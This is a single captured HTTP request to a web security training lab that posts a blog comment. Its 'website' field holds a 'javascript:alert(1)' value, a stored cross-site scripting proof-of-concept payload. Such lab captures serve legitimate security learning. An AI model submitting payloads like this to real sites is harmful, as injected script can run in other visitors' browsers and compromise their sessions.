POST /post/comment HTTP/1.1
Host: acc11f081f5f492780db48700026008d.web-security-academy.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://acc11f081f5f492780db48700026008d.web-security-academy.net/post?postId=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
Connection: close
Cookie: session=RNbaGMFZKTt3XPgNeqR54Fs6rxZMY4MS
Upgrade-Insecure-Requests: 1

csrf=LYKWdfBKMc0E8V5grnoVDsnN48oNN1BP&postId=3&comment=Hello World&name=Kiddie&email=kiddie@test.com&website=javascript:alert(1)
